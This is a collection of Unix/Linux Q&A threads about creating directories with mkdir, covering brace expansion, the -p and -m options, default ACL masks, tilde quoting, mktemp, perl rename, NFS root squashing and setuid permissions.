In Bash or Zsh, what is the shortest way to create a folder for each possible combination of substrings? Is there maybe even a notation such as mkdir {Single|Multi}Lane_{Single|Dual}Carriageway_{USA|Europe}which should result in the creation of SingleLane_SingleCarriageway_USA MultiLane_SingleCarriageway_USA SingleLane_DualCarriageway_USA MultiLane_DualCarriageway_USA SingleLane_SingleCarriageway_Europe MultiLane_SingleCarriageway_Europe SingleLane_DualCarriageway_Europe MultiLane_DualCarriageway_EuropeMy substrings also may have more than two options, such as {USA, Europe, Asia}.
How can I quickly create all folders named {Single|Multi}Lane_{Single|Dual}Carriageway_{USA|Europe}
The mkdir utility creates a single directory. When used with -m it creates the directory and effectively runs chmod on it with the given permissions (although this does not happen in two steps, which could be important under some circumstances). With -p, any intermediate directories that does not already exist are created. The mode given to -m still only applies to the last name in the pathname, since that is the directory that you're wanting to create (the intermediate directories are created to allow the creation of that directory with the given mode). The POSIX standard for mkdir say that each intermediate directory should be created with the mode (S_IWUSR|S_IXUSR|~filemask)&0777 where filemask is your shell's umask value. In the "Application Usage" section, it says[...] For intermediate pathname components created by mkdir, the mode is the default modified by u+ wx so that the subdirectories can always be created regardless of the file mode creation mask; if different ultimate permissions are desired for the intermediate directories, they can be changed afterwards with chmod.This means that the mode for the intermediate directories is set to allow you to create a directory that potentially have no user write or execute permissions. If the intermediate directories also were given no execute and/or write permissions, the last components of the directory path would not be able to be created. In your specific case, use mkdir -p -m 764 a/b/c chmod 764 a/b chmod 764 aIf you know for sure that none of the directories previously existed, use mkdir -p -m 764 a/b/c chmod -R 764 a
When I am using mkdir -pm 764 a/b/c then only c got that 764 permission, while a and b have default permission. Why does it so? Why doesn't all directories get 764 permission?
Regarding permissions on intermediate folders created using "mkdir -pm 764 a/b/c"
$ cd foo $ mkdir var1 $ mv * var1The shell and mv command are smart enough to not try to move the var1 directory into itself.
I have a directory foo/ bar.txt baz.yzw wun/ a.outNow, I would like to basically add a directory in between, i.e. I would like to make it foo/ var1/ bar.txt baz.yzw wun/ a.outwith the intent of also adding other stuff to foo, but kept separate from the old contents. I could of course do it like this: $ mkdir foo-new $ mv foo foo-new $ mv foo-new fooor $ cd foo $ mkdir var1 $ mv $(ls | grep -v var1) var1but both seem inelegant and are error-prone. Is there a better way to do it?
How to move a folder into itself?
In terms of tools used: no. touch will fail (rightly) if you are trying to operate in a directory that does not exist, and mkdir does precisely one thing: create directories, not normal files. Two different jobs mandate two different tools. That said, if you're talking about efficiency in terms of the number of lines in a script, or the readability of one, you could put it into a function: seedfile() { mkdir -p -- "$(dirname -- "$1")" && touch -- "$1" }seedfile /path/to/location/one/file.txt seedfile /path/to/somewhere/else/file.txt seedfile local/paths/work/too/file.txt
For now i use this: mkdir -p a/b/c/d/e; touch a/b/c/d/e/file.abc; Is there more efficient ways?
Create file in subdirectories that doesn't exist (../new_folder/new_folder/new_file.ext)
I compiled latest coreutils from source and I still need to use -p to create directory with parents: $ src/mkdir --version mkdir (GNU coreutils) 9.0.11-13af8$ src/mkdir a/b src/mkdir: cannot create directory ‘a/b’: No such file or directorySo you either have an alias for mkdir -p (and probably also with -v for verbose output because mkdir -p doesn't print the information about creating the directories) or coreutils is patched by your distribution.
I can't find any reference of this change of behaviour $ mkdir --version mkdir (GNU coreutils) 9.0 Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.Written by David MacKenzie.None of the folders exists. $ mkdir asdfg/qwerty mkdir: created directory 'asdfg' mkdir: created directory 'asdfg/qwerty'However, with mkdir (GNU coreutils) 8.25 the behaviour is as expected. ➜ ~ mkdir asdfg/qwerty mkdir: cannot create directory ‘asdfg/qwerty’: No such file or directory
If the `-p` flag not needed anymore in `mkdir` 9.0?
Yes, that syntax is not POSIX. Only a standalone {} (on its own argument) is guaranteed to be expanded. Use: find src_dir -type d -exec sh -c 'for dir do mkdir -p "dst_dir/$dir"; done' sh {} +Or to avoid running one mkdir per directory: find src_dir -type d -exec sh -c 'for dir do set -- "$@" "dst_dir/$dir"; shift; done mkdir -p "$@"' sh {} +(though there's a risk of reaching the "arg list too large" condition). Note that it would create dst_dir/src_dir/x/y.... If you wanted dst_dir/x/y..., you'd do: find src_dir -type d -exec sh -c 'for dir do set -- "$@" "dst_dir${dir#src_dir}"; shift; done mkdir -p "$@"' sh {} +Another option, if you can guarantee that directory paths don't contain newline characters would be to use pax: find src_dir -type d | pax -rw dst_dirThat would allow you do also copy the directories metadata like ownership and permissions (with -pe) To remove the leading src_dir component in the destination: find src_dir -path '*/*' -type d | pax -'s@^src_dir/@@' -rw dst_dirOr: (cd src_dir && find . -type d | pax -rw ../dst_dir)
I'm trying to copy directory structure from src_dir to dst_dir. On my CentOS 6.4 Linux Bash this command works fine. [localhost]$ find src_dir src_dir src_dir/dir2 src_dir/dir2/dir4 src_dir/dir1 src_dir/dir1/test.txt src_dir/dir1/dir3[localhost]$ find src_dir -type d -exec mkdir -p "dst_dir/{}" \; [localhost]$ find dst_dir dst_dir/src_dir dst_dir/src_dir/dir2 dst_dir/src_dir/dir1 dst_dir/src_dir/dir1/dir3 But, when I'm doing the same command in IBM AIX 6.1, I got this output [aix61:/data]find dst_dir dst_dir dst_dir/{} Maybe the 'find' command parameter {} replacement is somewhat different in AIX. But I don't know how to solve it. Any advice would be helpful.
IBM AIX find src_dir -type d -exec mkdir -p "dst_dir/{}" \; doesn't work
What you see in the ls listing are the "traditional" permission bits, all you'd have in a system that doesn't support ACLs, and all that can be used by tools (or users!) that aren't ACL-aware. The "traditional" group permission bits don't correspond to the owning group ACL, but to the ACL mask (acl(5) man page):CORRESPONDENCE BETWEEN ACL ENTRIES AND FILE PERMISSION BITS The permissions defined by ACLs are a superset of the permissions specified by the file permission bits. There is a correspondence between the file owner, group, and other permissions and specific ACL entries: the owner permissions correspond to the permissions of the ACL_USER_OBJ entry. If the ACL has an ACL_MASK entry, the group permissions correspond to the permissions of the ACL_MASK entry. Otherwise, if the ACL has no ACL_MASK entry, the group permissions correspond to the permissions of the ACL_GROUP_OBJ entry. The other permissions correspond to the permissions of the ACL_OTHER entry.What the mask does, is limit the permissions that can be granted by ACL entries for named users, named groups, or the owning group. In a way, you can think of the three sets of "traditional" permission bits as applying to 1) the owning user, 2) other explicitly defined users (without ACLs: members of a the owning group; with ACLs: those plus other named users or members of other named groups), and 3) everyone else. The practical reasoning there is that if a user or program wants to make sure only the owner has write permissions to the file, something like chmod go-w still works to do that, even without the actor knowing about ACLs. So, having it show rwx for the group in the ls listing is by design, since you have the user:zigbee2mqtt:rwx and user:stack:r-x ACL entries there. The ls output just hints that there are some others apart from the owning user who have read, write and/or execute permissions on the file. Setting the mask to 000 (with e.g. chmod g-rwx or the appropriate setfacl command) would make those ACL entries for user:zigbee2mqtt and user:stack ineffective.When you create a file with touch, and see mask::rw- on it, that's because touch and most other tools create regular files with permissions 0666, not 0777, leaving the x bits off. Most files shouldn't be executable. Regardless of the ACLs, the permissions passed to the open() system call still count, the same as if the permissions were changed with chmod(). Apart from leaving the x bits off, this allows a program to create private files by setting the permissions bits to 0600.
I am pretty sure it is a stupid mistake but I can't seem to figure it out by myself, so please have a look. I set up an ACL for the current folder like so: zigbee2mqtt@nuc:/tmp/folder$ getfacl . # file: . # owner: zigbee2mqtt # group: zigbee2mqtt user::rwx user:stack:r-x user:zigbee2mqtt:rwx user:milkpirate:rwx group::--- mask::rwx other::--- default:user::rwx default:user:stack:r-x default:user:zigbee2mqtt:rwx default:user:milkpirate:rwx default:group::--- default:mask::rwx default:other::--- zigbee2mqtt@nuc:/tmp/folder$ id uid=978(zigbee2mqtt) gid=977(zigbee2mqtt) groups=977(zigbee2mqtt)so when I now create a folder/file in that folder like so: zigbee2mqtt@nuc:/tmp/folder$ touch foo; mkdir barIt results in the following permission on the folder foo: zigbee2mqtt@nuc:/tmp/folder$ getfacl foo # file: foo # owner: zigbee2mqtt # group: zigbee2mqtt user::rwx user:stack:r-x user:zigbee2mqtt:rwx user:milkpirate:rwx group::--- mask::rwx other::--- default:user::rwx default:user:stack:r-x default:user:zigbee2mqtt:rwx default:user:milkpirate:rwx default:group::--- default:mask::rwx default:other::---which looks fine so far. But the ACL of the file then looks off: # file: bar # owner: zigbee2mqtt # group: zigbee2mqtt user::rw- user:stack:r-x #effective:r-- user:zigbee2mqtt:rwx #effective:rw- user:milkpirate:rwx #effective:rw- group::--- mask::rw- other::---I would expect the mask to be rwx (desired). Since group and other are --- (desired) the permission in ls -la to be the same, but they are:zigbee2mqtt@nuc:/tmp/folder$ ls -la total 20 drwxrwx---+ 3 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 . drwxrwxrwt 16 root root 4096 Jan 15 17:59 .. -rw-rw----+ 1 zigbee2mqtt zigbee2mqtt 0 Jan 15 17:55 bar drwxrwx---+ 2 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 foobut I would expect (and desire): zigbee2mqtt@nuc:/tmp/folder$ ls -la total 20 drwxrwx---+ 3 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 . drwxrwxrwt 16 root root 4096 Jan 15 17:59 .. -rw-------+ 1 zigbee2mqtt zigbee2mqtt 0 Jan 15 17:55 bar drwx------+ 2 zigbee2mqtt zigbee2mqtt 4096 Jan 15 17:55 fooEDIT: Ok, did some testing and all seems to work as desired, the result of ls -la does not seem to reflect the correct rights: zigbee2mqtt@nuc:/tmp/folder$ sudo -u nginx -g zigbee2mqtt bash nginx@nuc:/tmp/folder$ ls ls: cannot open directory '.': Permission denied
touch/mkdir seems to ignore default ACL
Bash, like any POSIX shell, splits commands into tokens before expanding words (which, in Bash, includes brace expansion). mkdir -p /root/backups/{db, dirs}contains a space, so the command is first split into the tokens mkdir, -p, /root/backups/{db,, and dirs}. None of these need further expansion, so mkdir is run with the three arguments -p, /root/backups/{db, and dirs}. It creates {db in /root/backups, and dirs} in the current directory. If you drop the space you’ll get the behaviour you’re after.
I executed the following code in Ubuntu server 16.04 xenial: mkdir -p /root/backups/{db, dirs}I recall that in another system, it worked like charm creating all 3 dirs: /root/backups/ /root/backups/db /root backup/dirsYet this time the result was: /root/backups/ /root/backups/{db,Why is this partial, broken result?
mkdir -p dir with braces created wrongly
You can use the following 'command' to get the desired result: for i in {1..7}; do mkdir /tmp/$(date +"%A" --date "$i days ago"); done
How can I create directories named as days of the week (i.e Monday, Tuesday, .... Saturday) inside a directory like /tmp/ in one command only? Like combination of mkdir with date +%A or any other. mkdir -p /tmp/"$(date +%A)" ---> /tmp/TuesdayShould be as below after command executes. /tmp/Monday /tmp/Tuesday . . . /tmp/SaturdayI want this in a single command, not a script.
One liner mkdir with directory naming as days?
PATH is an environment variable. It's what your shell uses to find the commands it is going to run. More precisely, the PATH environment variable contains a colon-separated list of directory names, which are searched in sequence for an executable with the name that you specify when you type a command. (Unless of course the command you type is a shell builtin, alias or function.) When you set PATH in your script you are "masking" the value of the environment variable with the shell variable of the same name. The takeaway from this is don't use all caps names for regular shell variables. Since you don't intend an environment variable, just use a lowercase variable name. Also see:Are there naming conventions for variables in shell scripts?
I have separate scripts for tasks in bash. Here is the broken one: #!/bin/bash PATH=/home/name/ mkdir $PATH cd $PATH && echo "done." exit 0Today it broke and first time it simply didn't want to run cd, but created directory. Second time it just said "mkdir command not found." Running this commands exactly with semicolon works fine. What the case?
Bash can't run command from script: mkdir command not found [closed]
~USER is just a shorthand notation for the home directory of user USER. For a normal user, this would typically be /home/USER, but for root, it is typically /root. As for your question whether one is preferable to the other: The only difference is that ~root gets expanded dynamically to root's home directory, whereas /root is an absolute path that does not undergo any expansion process. What you want depends on your particular use case. If you want your script to work on machines where root's home directory lies elsewhere than in /root, then use ~root. If you want to make sure that the absolute path /root is always used, use /root. In practice, it should not make any difference in most cases, though I would personally feel safer using /root unless I have reason to expect that my script will be run on machines where root's home directory is not /root.
This is fairly trivial and I'm just curious as to why mkdir ~root/.ssh is the same thing as mkdir /root/.ssh? I'm reviewing the following docker file and the creator uses mkdir ~root/.ssh to create the .ssh directory: https://github.com/macropin/docker-sshd/blob/master/Dockerfile Is there any advantage to one over the other? When I first read it I assumed that ~root would expand to /rootroot.
Why is `mkdir ~root/.ssh` the same thing as `mkdir /root/.ssh`?
When using mkdir, the script would have to make sure that it creates a directory with a name that does not already exist. It would be an error to use mkdir dirname if dirname is an existing name in the current directory. When creating a temporary directory (i.e. a directory that is not needed much longer than during the lifetime of the current script), the name of the directory is not generally important, and mktemp -d will find a name that is not already taken by something else. mktemp -d makes it easier and more secure to create a temporary directory. Without mktemp -d, one would have to try to mkdir with several names until one succeeded. This is both unnecessarily complicated and can be done wrongly (possibly introducing subtle race conditions in the code). mktemp also gives the user of the script a bit of control in where they want the temporary directory to be created. If the script, for example, produces a massive amount of temporary data that has to be stored in that directory, the user may set the TMPDIR environment variable (before or as they are invoking the script) to point to a writable directory on a partition where there is enough space available. mktemp -d would then create the temporary directory beneath that path. If TMPDIR is not set, mktemp will use /tmp in its place.
I try to understand Stephen Kitt's answer to this question where he created a temporary directory with the following code: #!/bin/bashscripttmp=$(mktemp -d) # Create a temporary directory (these will usually be created under /tmp or /var/tmp/)Each time I run this command I see a new temporary directory created under /tmp/ (I didn't know it will appear there until reading Roaima's answer here): IIUC, there is no programmatical difference between a regular directory to a temporary directory (the only difference is in how these directories are used, by means of the time each one stays on the machine). If there is no programmatical difference, why should one prefer mktemp -d over the more minimal mkdir?
Is there a programmatical difference between directories created with mktemp -d or mkdir?
Using the perl rename utility: Note: perl rename is also known as file-rename, perl-rename, or prename. Not to be confused with the rename utility from util-linux which has completely different and incompatible capabilities and command-line options. perl rename is the default rename on Debian...IIRC, it's in the prename package on Centos and the command should be executed as prename rather than rename. $ rename -n 'if (m/(^\d{4}_\d\d_\d\d)_(\d\d)/) { my ($date,$hour) = ($1,$2); my $dir = "./$date/$hour/"; mkdir $date; mkdir $dir; s=^=$dir= }' * rename(2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz, ./2021_10_15/23/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz) rename(2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz) rename(2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz) rename(2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz) rename(2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz) rename(2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz, ./2021_11_24/21/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz) rename(2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz) rename(2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz) rename(2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz) rename(2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz, ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz)The -n is a dry-run option, it will only show what it would do without actually doing it. Remove it (or replace with -v for verbose output) when you're sure the rename script is going to do what you want. The script works by first extracting the date and hour portions of each filename (skipping any filenames that don't match). Then it creates the directories for the date and date/hour, then renames the filename into those directories. This assumes that the filenames are in the current directory. If they aren't, you'll have to adjust the m// matching regex in the first line AND the s=== substitution regex in the second-last line.Alternate version using the File::Path perl core module (which is included with perl), instead of using mkdir twice (the make_path function works like the mkdir -p shell command): $ rename -v 'BEGIN {use File::Path qw(make_path)}; if (m/(^\d{4}_\d\d_\d\d)_(\d\d)/) { my $dir = "./$1/$2/"; make_path $dir; s=^=$dir= }' * 2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz renamed as ./2021_10_15/23/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz 2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz 2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz 2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz 2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz 2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz renamed as ./2021_11_24/21/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz 2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz 2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz 2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz 2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz renamed as ./2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gzThis isn't really any better than the first version, but it does demonstrate that you can use any perl code, any perl module to rename and/or move files.Third version, this one uses File::Basename to split the input pathname into $path and $file portions. It can cope with filenames in the current directory, or in any other directory. File::Basename is a core perl module, so is included with perl. It provides three useful functions, basename() and dirname() (which work similarly to the shell tools of the same name), and fileparse() which is what I'm using in this script to extract both the basename and the directory into separate variables. rename -n 'BEGIN {use File::Path qw(make_path); use File::Basename}; my ($file, $path) = fileparse($_); if ($file =~ m/(\d{4}_\d\d_\d\d)_(\d\d)/) { my $dir = "$path/$1/$2"; make_path $dir; $_ = "$dir/$file" }' /home/cas/rename-test/* rename(/home/cas/rename-test/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz, /home/cas/rename-test/2021_10_15/23/2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz) rename(/home/cas/rename-test/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz, /home/cas/rename-test/2021_11_24/21/2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz) rename(/home/cas/rename-test/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz, /home/cas/rename-test/2021_11_25/20/2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz)BTW, it would be trivial to modify this so that it moved the files to a completely different path - just make it do something like my $dir = "/my/new/path/$1/$2"; instead of my $dir = "$path/$1/$2"; The key thing to understand about how the perl rename utility works is that iff the rename script modifies the $_ variable then rename will attempt to rename the file to the new value of $_. If $_ is unchanged, it will not try to rename it. This is why you can use any perl code to rename files - has to do is change $_. Most often you'll probably use very simple sed-like rename scripts (e.g. rename 's/ +/_/g' * to rename spaces in filenames to an underscore) but the rename algorithm can be as complex as you need it to be. $_ is a very important variable in perl - it's used as the default variable to hold input from file handles and iterators for loops if the programmer doesn't specify one. It's also used as the default operand for several operators (like m//, s///, tr///) and as the default argument for many (but not all) functions. See man perlvar and search for $_ (you'll need to escape that in less as \$_).BTW, one thing I didn't mention about rename earlier is that it can take filenames either as arguments on the command line or from stdin. It defaults to newline-separated input from stdin (so it won't work with filenames that contain newlines - an annoying but completely valid possibility). You can use the -0 argument to make it use NUL separated input instead of newline-separated...so, it can work with any filenames, taking input from anything that can generate a list of NUL-separated filenames (e.g. find ... -print0, but it's probably better to just use find's -exec ... {} + option). rename will also refuse to rename a file over an existing file unless you use its -f or --force option.
I have many files in a folder Main which are named like these: 2021_10_15_23_35_SIP_CDR_pid3894_ins2_thread_1_4718.csv.gz 2021_11_24_21_15_Gi_pid25961_ins2_thread_1_6438.csv.gz 2021_11_25_20_55_Gi_pid29741_ins5_thread_4_7540.csv.gz 2021_11_24_21_15_Gi_pid27095_ins2_thread_1_6485.csv.gz 2021_11_25_20_55_Gi_pid30842_ins3_thread_2_7489.csv.gz 2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz 2021_11_25_20_55_Gi_pid30842_ins4_thread_3_7488.csv.gz 2021_11_24_21_15_Gi_pid27095_ins4_thread_3_6485.csv.gz 2021_11_25_20_55_Gi_pid30842_ins5_thread_4_7489.csv.gz 2021_11_24_21_15_Gi_pid681_ins5_thread_4_6457.csv.gzThe first 10 characters shows the date, followed by the digits which is the time in 24 hour format. The rest is the file details which we can ignore. I want to create folders within the Main folder based on the date in the filename and then another folder inside the date folder based on the hour in file name. Eventually I want to move the files from the Main folder into the respective hour folder. Main -> Date -> hh -> file.csv.gzFor eg: The file 2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz in the Main folder will eventually end up in a folder like this with the below path Main/2021_11_24/21/2021_11_24_21_15_Gi_pid27095_ins3_thread_2_6485.csv.gz Can you please help with the bash script to achieve the grouping of files in folders like mentioned above?
Creating and arranging files into folders based on date and time in file name
~ doesn’t have a special meaning when it’s quoted. Thus to enter your new directory: cd "~"And to fix your initial mkdir: mkdir -p ~/.aa/.bb
I want to create the nested folder .aa/.bb in the current user root's home directory. So I use the command mkdir -p "~/.aa/.bb/". But it doesn't work as I expected and it created a folder ~, which I don't know how to enter into. Below is my testing. root@u2004:~# pwd /root root@u2004:~# ls -la total 28 drwx------ 3 root root 4096 Aug 28 14:46 . drwxr-xr-x 20 root root 4096 Aug 28 01:22 .. -rw------- 1 root root 3285 Aug 28 21:56 .bash_history -rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc drwx------ 2 root root 4096 Aug 1 00:31 .cache -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rwxr-xr-x 1 root root 89 Aug 28 14:46 setproxy.sh root@u2004:~# mkdir -p "~/.aa/.bb/" root@u2004:~# ls -la total 32 drwx------ 4 root root 4096 Aug 28 21:59 . drwxr-xr-x 20 root root 4096 Aug 28 01:22 .. drwxr-xr-x 3 root root 4096 Aug 28 21:59 '~' <-------------------- -rw------- 1 root root 3285 Aug 28 21:56 .bash_history -rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc drwx------ 2 root root 4096 Aug 1 00:31 .cache -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rwxr-xr-x 1 root root 89 Aug 28 14:46 setproxy.sh root@u2004:~# root@u2004:~# cat /etc/*release* DISTRIB_ID=Ubuntu DISTRIB_RELEASE=20.04 DISTRIB_CODENAME=focal DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS" NAME="Ubuntu" VERSION="20.04.1 LTS (Focal Fossa)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 20.04.1 LTS" VERSION_ID="20.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=focal UBUNTU_CODENAME=focal root@u2004:~# Any ideas?
How to create nested folders (start with .) properly?
This zsh script will pick up the two newest (plain) files in the current directory, gather the modification timestamp of the most recent one, convert that timestamp to YYYYmmdd format, create the directory, then copy those two newest files into that directory: #!/bin/zshnewest2=( *(.om[1,2]) ) dsec=$( stat -c %Y "${newest2[1]}" ) dnam=$( date -d @"$dsec" +%Y%m%d ) mkdir "$dnam" cp -- "${newest2[@]}" "$dnam"The first line, assigning newest2, expands the * wildcard with a qualifier (in parenthesis). The qualifier asks for:. -- plain files om -- ordered by modification time (newest to oldeset) [1,2] -- slice the list to include only elements 1 through 2We then ask stat for the modification time in seconds of the newest file; that date is passed in to GNU date, who returns the directory name in the format we want. After creating the directory, the cp command copies the two files into that directory.
I am trying to create a directory based on the timestamp of the 2 newest files in a directory and then copy those 2 files in to the newly created directory. SO for example -rw-r--r-- 1 root root 0 Sep 24 12:01 a-rw-r--r-- 1 root root 0 Sep 24 12:01 bI want to create a directory called 20190924 and copy a and b into the directory which are the newest files in the current directory
Create directory with timestamp of newest files
This is due to "root squash" on the NFS server. From the exports(5) man page (emphasis mine):nfsd bases its access control to files on the server machine on the uid and gid provided in each NFS RPC request. The normal behavior a user would expect is that she can access her files on the server just as she would on a normal file system. This requires that the same uids and gids are used on the client and the server machine. This is not always true, nor is it always desirable. Very often, it is not desirable that the root user on a client machine is also treated as root when accessing files on the NFS server. To this end, uid 0 is normally mapped to a different id: the so-called anonymous or nobody uid. This mode of operation (called 'root squashing') is the default, and can be turned off with no_root_squash.To paraphrase, it's generally a security risk to allow root (e.g., when running sudo) on the NFS client to modify files and file attributes as if it were root on the NFS server. This would effectively make root on the client equivalent to root on the server, and allow a rogue client to take over the server. From the RHEL 6 security guide:If no_root_squash is used, remote root users are able to change any file on the shared file system and leave applications infected by Trojans for other users to inadvertently execute.
I've written a script that copies some files from one place to another and since I don't have permissions to the source folder, I tried running it with sudo. The problem is that now the creation of the destination folders fails. Here is a simple test case: In my home directory the following works: mkdir testDirBut this fails due to permission denied error sudo mkdir testDir2My home directory has 755 permissions and is own by me. I ran sudo groups and found that as expected the root group is there, but strangely, the users is not. Also running groups as myself reveals that I'm not in the sudo group. Any ideas what's going on? Why am I not able to write to my home folder when running with sudo?
Sudo mkdir fails due to permission denied error
You’ve cleared the executable permission for the file’s owner, but not for members of its group or other users. As a result, the only user denied access by the permissions is root; every other user is granted permission. (root can still execute the binary, because root can execute any binary with any one of its executable bits set.) The setuid bit doesn’t affect how permissions are granted or denied; it only affects the effective uid of processes when they execute the binary. See Understanding UNIX permissions and file types and Restrictive "group" permissions but open "world" permissions? for details.
I am setting setuid on mkdir without making it as executable. chmod u+s /usr/bin/mkdirchmod u-x /usr/bin/mkdir[root@rhel-85 /]# ls -l /usr/bin/mkdir -rwSr-xr-x. 1 root root 84664 Jul 9 2021 /usr/bin/mkdirNow, when I login as another user "user1" I am still able to create directory even when the "mkdir" binary is non-executable. My understanding is that "user1" should not be able to create directory because mkdir is non-executable.
Setting setuid on `mkdir` without making it as executable
You could cd into folderA and run the command from there: cd folderA find . -type d -o -type f -exec bash -c ' for path; do mkdir -p "/path/to/folderB/${path/file/folder}"; done ' bash {} +The parameter expansion ${path/file/folder} renames the each fileXY to folderXY. If every folder contains files, you can remove the -type d -o.
| folderA1 | fileA11, fileA12, ... folderA | folderA2 | fileA21, fileA22... | ... | ... I want to make a copy of it represented as: | folderA1 | folderA11, folderA12, ... folderB | folderA2 | folderA21, folderA22, ... | ... | ...The original folderA (and it's structure) remains as it is (unchanged). I'm trying to create a folder in (folder) B for each file in a (folder) A without the folder itself. I also would like to maintain the directory structure of the original folder (A). Using this question I'm able to achieve the generation of the above but it contains the folder A itself. find source/. -type d -exec mkdir -p dest/{} \; \ -o -type f -exec mkdir -p dest/{} \;Looks like: | | folderA1 | folderA11, folderA12, ... folderB | folderA | folderA2 | folderA21, folderA22, ... | | ...
Create a folder for each file in a folder without the folder itself
